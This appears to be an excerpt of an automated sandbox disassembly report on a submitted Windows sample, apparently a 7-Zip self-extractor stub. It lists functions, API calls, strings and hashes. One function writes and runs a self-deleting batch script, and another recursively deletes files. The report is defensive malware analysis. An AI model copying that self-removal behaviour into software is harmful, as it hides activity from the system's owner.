                                                                  • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                  • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                  • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                  • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                  Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                  • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                  • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                  • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                  • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                  • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                  • String ID:
                                                                  • API String ID: 1862581289-0
                                                                  • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                  • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                  • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                  • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                  Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                  • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AddressLibraryLoadProc
                                                                  • String ID: SetWindowTheme$\EA$uxtheme
                                                                  • API String ID: 324724604-1613512829
                                                                  • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                  • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                  • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                  • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                  Function 0041022D Relevance: .5, Instructions: 501COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                  • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                  • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                  • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                  Function 0041206B Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                  • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                  • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                  • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                  Function 00411F91 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                  • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                  • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                  • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                  Function 0040D72E Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                  • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                  • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                  • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                  Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                  • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                  • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                  • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                  • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                  • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                  • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                  • API String ID: 3007203151-3467708659
                                                                  • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                  • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                  • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                  • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                  Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                    • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                    • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                    • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                    • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                    • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                  • _wtol.MSVCRT ref: 004047DC
                                                                  • _wtol.MSVCRT ref: 004047F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                  • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                  • API String ID: 2725485552-3187639848
                                                                  • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                  • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                  • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                  • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                  Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                  • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                  • GetParent.USER32(?), ref: 00402E2E
                                                                  • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                  • GetMenu.USER32(?), ref: 00402E55
                                                                  • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                  • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                  • DestroyWindow.USER32(?), ref: 00402EA3
                                                                  • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                  • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                  • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                  • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                  • API String ID: 1731037045-2281146334
                                                                  • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                  • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                  • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                  • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                  Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                  • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                  • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                  • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                  • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                  • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                  • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                  • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                  • String ID:
                                                                  • API String ID: 3462224810-0
                                                                  • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                  • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                  • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                  • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                  Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                  • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                  • GetMenu.USER32(?), ref: 00401E44
                                                                    • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                    • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                    • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                    • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                    • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                    • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                  • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                  • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                    • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                    • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                    • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                    • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                    • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                    • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                    • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                    • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                    • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                    • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                    • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                    • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                  • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                  • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                  • String ID: IMAGES$STATIC
                                                                  • API String ID: 4202116410-1168396491
                                                                  • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                  • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                  • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                  • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                  Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                  • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                  • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                  • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                  • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                  • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                  • SetFocus.USER32(00000000), ref: 0040821D
                                                                  • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                  • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                  • IsWindow.USER32(00000000), ref: 00408297
